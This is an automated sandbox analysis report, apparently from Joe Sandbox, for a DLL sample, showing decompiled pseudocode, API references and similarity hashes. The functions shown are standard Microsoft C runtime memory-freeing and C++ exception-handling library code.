Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1860
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1872
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1884
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1896
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18A8
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18BA
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18CC
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18DE
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F18F0
Part of subcall function 6E9F180D: _free.LIBCMT ref: 6E9F1902

_free.LIBCMT ref: 6E9F03A0

Part of subcall function 6E9EDC0E: HeapFree.KERNEL32(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36

_free.LIBCMT ref: 6E9F03C2
_free.LIBCMT ref: 6E9F03D7
_free.LIBCMT ref: 6E9F03E2
_free.LIBCMT ref: 6E9F0404
_free.LIBCMT ref: 6E9F0417
_free.LIBCMT ref: 6E9F0425
_free.LIBCMT ref: 6E9F0430
_free.LIBCMT ref: 6E9F0468
_free.LIBCMT ref: 6E9F046F
_free.LIBCMT ref: 6E9F048C
_free.LIBCMT ref: 6E9F04A4

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 685447299f0cc032eea5d6be2e0a6e3e0e5fd6858fc8c2e30b44ddd408a2d8f5
Instruction ID: c2eb77726e84319933727047bb88f346897cfff9220fe5817232d387ecb4e4f7
Opcode Fuzzy Hash: 685447299f0cc032eea5d6be2e0a6e3e0e5fd6858fc8c2e30b44ddd408a2d8f5
Instruction Fuzzy Hash: 24318E71604305DFEB629AF9D941B8E73EDAF80354F10892AE565D7650EFB0E881CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EB0CB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E9EB0CB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6E9EC03D(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E9ED547(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E9EAD86(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E9EAD86(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E9EA645(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E9EA578(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E9EB04B(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E9ED547(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E9EAD86(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E9EAD86(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E9EAD86(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E9EA578(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E9EB04B(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E9EAB2E(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E9EBADA(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E9EBADA(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E9ED3B8(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E9EB76E( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6e9fc920) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E9EAB2E(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E9EB756( &_v64);
											E6E9EA50C( &_v64, 0x6e9fa7ac);
											L63:
											 *(E6E9EAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E9EAD86(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E9EA76B(_t279, _t319, _t274);
											E6E9EB9DA(_a8, _a16, _t305);
											_t235 = E6E9EBB97(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E9EB951(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6e9eb0cb
0x6e9eb0d2
0x6e9eb0d4
0x6e9eb0dd
0x6e9eb0e3
0x6e9eb0eb
0x6e9eb0ed
0x6e9eb0f0
0x6e9eb0f6
0x6e9eb46f
0x6e9eb46f
0x6e9eb474
0x6e9eb476
0x6e9eb478
0x6e9eb47b
0x6e9eb47c
0x6e9eb47f
0x6e9eb485
0x6e9eb5a4
0x6e9eb48b
0x6e9eb48b
0x6e9eb48c
0x6e9eb48d
0x6e9eb494
0x6e9eb497
0x6e9eb49a
0x6e9eb4a0
0x6e9eb4a2
0x6e9eb4a7
0x6e9eb4aa
0x6e9eb4ac
0x6e9eb4b2
0x6e9eb4b4
0x6e9eb4ba
0x6e9eb4cf
0x6e9eb4d4
0x6e9eb4d7
0x6e9eb4d9
0x6e9eb5a0
0x00000000
0x6e9eb5a1
0x6e9eb4d9
0x6e9eb4ba
0x6e9eb4b2
0x6e9eb4aa
0x6e9eb4df
0x6e9eb4e2
0x6e9eb4e5
0x6e9eb4e8
0x6e9eb4eb
0x6e9eb4f1
0x6e9eb503
0x6e9eb508
0x6e9eb50b
0x6e9eb50e
0x6e9eb511
0x6e9eb514
0x6e9eb517
0x6e9eb51a
0x00000000
0x00000000
0x6e9eb520
0x6e9eb520
0x6e9eb523
0x6e9eb526
0x6e9eb535
0x6e9eb536
0x6e9eb536
0x6e9eb538
0x6e9eb53b
0x00000000
0x00000000
0x6e9eb53d
0x6e9eb540
0x00000000
0x00000000
0x6e9eb54e
0x6e9eb550
0x6e9eb553
0x6e9eb555
0x6e9eb55d
0x6e9eb55d
0x6e9eb560
0x6e9eb562
0x6e9eb564
0x6e9eb580
0x6e9eb585
0x6e9eb588
0x6e9eb588
0x00000000
0x6e9eb560
0x6e9eb557
0x6e9eb55b
0x00000000
0x00000000
0x00000000
0x6e9eb58b
0x6e9eb58e
0x6e9eb58f
0x6e9eb592
0x6e9eb595
0x6e9eb598
0x6e9eb59b
0x6e9eb59b
0x00000000
0x6e9eb526
0x6e9eb5a5
0x6e9eb5aa
0x6e9eb5ab
0x6e9eb5ae
0x6e9eb5b1
0x6e9eb5b2
0x6e9eb5b3
0x6e9eb5b4
0x6e9eb5b7
0x6e9eb5b9
0x6e9eb631
0x6e9eb633
0x6e9eb633
0x6e9eb5bb
0x6e9eb5bb
0x6e9eb5be
0x6e9eb5c1
0x00000000
0x6e9eb5c3
0x6e9eb5c3
0x6e9eb5c6
0x6e9eb5c9
0x6e9eb5d0
0x6e9eb5d0
0x6e9eb5d3
0x6e9eb5d5
0x6e9eb5d7
0x6e9eb609
0x6e9eb609
0x6e9eb60c
0x6e9eb613
0x6e9eb613
0x6e9eb616
0x6e9eb619
0x6e9eb620
0x6e9eb620
0x6e9eb623
0x6e9eb62a
0x6e9eb62c
0x6e9eb62c
0x6e9eb625
0x6e9eb625
0x6e9eb628
0x00000000
0x00000000
0x6e9eb628
0x6e9eb61b
0x6e9eb61b
0x6e9eb61e
0x00000000
0x00000000
0x6e9eb61e
0x6e9eb60e
0x6e9eb60e
0x6e9eb611
0x00000000
0x00000000
0x6e9eb611
0x6e9eb62d
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5d9
0x6e9eb5dc
0x6e9eb5dc
0x6e9eb5de
0x6e9eb5e0
0x00000000
0x00000000
0x6e9eb5e2
0x6e9eb5e4
0x6e9eb5f8
0x6e9eb5f8
0x6e9eb5e6
0x6e9eb5e6
0x6e9eb5e9
0x6e9eb5ec
0x00000000
0x6e9eb5ee
0x6e9eb5ee
0x6e9eb5f1
0x6e9eb5f4
0x6e9eb5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb5f6
0x6e9eb5ec
0x6e9eb601
0x6e9eb601
0x6e9eb603
0x00000000
0x6e9eb605
0x6e9eb605
0x6e9eb605
0x00000000
0x6e9eb603
0x6e9eb5fc
0x6e9eb5fe
0x6e9eb5fe
0x00000000
0x6e9eb5fe
0x6e9eb5cb
0x6e9eb5cb
0x6e9eb5ce
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb5ce
0x6e9eb5c9
0x6e9eb5c1
0x6e9eb634
0x6e9eb638
0x6e9eb638
0x6e9eb105
0x6e9eb105
0x6e9eb10e
0x6e9eb20b
0x6e9eb20b
0x6e9eb20e
0x00000000
0x6e9eb13d
0x6e9eb13d
0x6e9eb142
0x00000000
0x6e9eb148
0x6e9eb148
0x6e9eb150
0x6e9eb409
0x6e9eb40d
0x6e9eb156
0x6e9eb15b
0x6e9eb15e
0x6e9eb163
0x6e9eb16a
0x6e9eb16f
0x00000000
0x6e9eb1a7
0x6e9eb1af
0x6e9eb213
0x6e9eb213
0x6e9eb216
0x6e9eb219
0x6e9eb21b
0x6e9eb21e
0x6e9eb221
0x6e9eb227
0x6e9eb3d8
0x6e9eb3d8
0x6e9eb3db
0x00000000
0x6e9eb3dd
0x6e9eb3dd
0x6e9eb3e0
0x00000000
0x6e9eb3e6
0x6e9eb3e6
0x6e9eb3e9
0x6e9eb3ec
0x6e9eb3ed
0x6e9eb3ee
0x6e9eb3f1
0x6e9eb3f2
0x6e9eb3f5
0x6e9eb3f6
0x6e9eb3fb
0x00000000
0x6e9eb3fb
0x6e9eb3e0
0x6e9eb22d
0x6e9eb22d
0x6e9eb231
0x00000000
0x6e9eb237
0x6e9eb237
0x6e9eb23e
0x6e9eb256
0x6e9eb256
0x6e9eb259
0x6e9eb25c
0x6e9eb262
0x6e9eb272
0x6e9eb277
0x6e9eb27a
0x6e9eb27d
0x6e9eb280
0x6e9eb283
0x6e9eb286
0x6e9eb289
0x6e9eb28f
0x6e9eb28f
0x6e9eb292
0x6e9eb295
0x6e9eb2a4
0x6e9eb2a5
0x6e9eb2a5
0x6e9eb2a7
0x6e9eb2aa
0x6e9eb2b0
0x6e9eb2b3
0x6e9eb2b9
0x6e9eb2bb
0x6e9eb2be
0x6e9eb2c1
0x6e9eb2ca
0x6e9eb2cd
0x6e9eb2cf
0x6e9eb2cf
0x6e9eb2d2
0x6e9eb2d5
0x6e9eb2d8
0x6e9eb2db
0x6e9eb2de
0x6e9eb2e3
0x6e9eb2e4
0x6e9eb2e5
0x6e9eb2e6
0x6e9eb2e7
0x6e9eb2ea
0x6e9eb2ec
0x6e9eb2ee
0x00000000
0x6e9eb2f0
0x6e9eb2f0
0x6e9eb2f0
0x6e9eb2f3
0x6e9eb2f6
0x6e9eb2f8
0x6e9eb2f9
0x6e9eb2fe
0x6e9eb301
0x6e9eb303
0x00000000
0x00000000
0x6e9eb305
0x6e9eb306
0x6e9eb309
0x6e9eb30b
0x00000000
0x6e9eb30d
0x6e9eb30d
0x6e9eb310
0x6e9eb313
0x00000000
0x6e9eb313
0x00000000
0x6e9eb30b
0x6e9eb327
0x6e9eb32d
0x6e9eb34a
0x6e9eb34f
0x6e9eb34f
0x6e9eb352
0x6e9eb352
0x00000000
0x6e9eb316
0x6e9eb316
0x6e9eb317
0x6e9eb31a
0x6e9eb31d
0x6e9eb320
0x6e9eb320
0x00000000
0x6e9eb325
0x6e9eb2c1
0x6e9eb2b3
0x6e9eb355
0x6e9eb358
0x6e9eb359
0x6e9eb35c
0x6e9eb35f
0x6e9eb362
0x6e9eb365
0x6e9eb365
0x6e9eb36e
0x6e9eb371
0x6e9eb371
0x6e9eb289
0x6e9eb374
0x6e9eb378
0x6e9eb37a
0x6e9eb37d
0x6e9eb383
0x6e9eb383
0x6e9eb38b
0x6e9eb390
0x6e9eb3fe
0x6e9eb3fe
0x6e9eb403
0x6e9eb407
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb392
0x6e9eb392
0x6e9eb396
0x6e9eb3a8
0x6e9eb3ab
0x6e9eb3ae
0x6e9eb3b0
0x6e9eb3c7
0x6e9eb3cb
0x6e9eb3d1
0x6e9eb3d2
0x6e9eb3d4
0x00000000
0x6e9eb3d6
0x00000000
0x6e9eb3d6
0x6e9eb3b2
0x6e9eb3b7
0x6e9eb3ba
0x6e9eb3bf
0x6e9eb3c2
0x00000000
0x6e9eb3c2
0x6e9eb398
0x6e9eb39b
0x6e9eb39e
0x6e9eb3a0
0x00000000
0x6e9eb3a2
0x6e9eb3a2
0x6e9eb3a6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb3a6
0x6e9eb3a0
0x6e9eb396
0x6e9eb240
0x6e9eb240
0x6e9eb247
0x00000000
0x6e9eb249
0x6e9eb249
0x6e9eb250
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eb250
0x6e9eb247
0x6e9eb23e
0x6e9eb231
0x6e9eb1b1
0x6e9eb1b9
0x6e9eb1bc
0x6e9eb1c1
0x6e9eb1c5
0x6e9eb1c8
0x6e9eb1ce
0x6e9eb1d1
0x00000000
0x6e9eb1d3
0x6e9eb1d3
0x6e9eb1d6
0x6e9eb1d8
0x6e9eb40e
0x6e9eb40e
0x00000000
0x6e9eb1de
0x6e9eb1e6
0x6e9eb1f1
0x00000000
0x00000000
0x6e9eb1fa
0x6e9eb1fd
0x6e9eb1fe
0x6e9eb201
0x6e9eb203
0x00000000
0x6e9eb209
0x00000000
0x6e9eb209
0x00000000
0x6e9eb203
0x6e9eb1de
0x6e9eb413
0x6e9eb413
0x6e9eb415
0x6e9eb416
0x6e9eb41d
0x6e9eb420
0x6e9eb42e
0x6e9eb433
0x6e9eb438
0x6e9eb43b
0x6e9eb440
0x6e9eb443
0x6e9eb446
0x6e9eb448
0x6e9eb44a
0x6e9eb44a
0x6e9eb44f
0x6e9eb45b
0x6e9eb461
0x6e9eb466
0x6e9eb469
0x6e9eb46a
0x00000000
0x6e9eb46a
0x6e9eb1d1
0x6e9eb1af
0x6e9eb16f
0x6e9eb150
0x6e9eb142
0x6e9eb10e

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EB1C8
type_info::operator==.LIBVCRUNTIME ref: 6E9EB1EA
___TypeMatch.LIBVCRUNTIME ref: 6E9EB2F9
IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EB3CB
_UnwindNestedFrames.LIBCMT ref: 6E9EB44F
CallUnexpected.LIBVCRUNTIME ref: 6E9EB46A

Strings

csm, xrefs: 6E9EB221
csm, xrefs: 6E9EB175
csm, xrefs: 6E9EB108

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: fd0d6bd0518f12673e78f40b51eb64be5ca8fbc08558b3d15fd3067cc87f7f61
Instruction ID: 1c9ab93d6c74720c62ae2c054160482ef6b85860a53f79526490c2bb298f8b51
Opcode Fuzzy Hash: fd0d6bd0518f12673e78f40b51eb64be5ca8fbc08558b3d15fd3067cc87f7f61
Instruction Fuzzy Hash: FDB17A31801309EFCF26CFE4D880A9EB7B9BF54314F00455AEA146BA29E331DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ED878 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

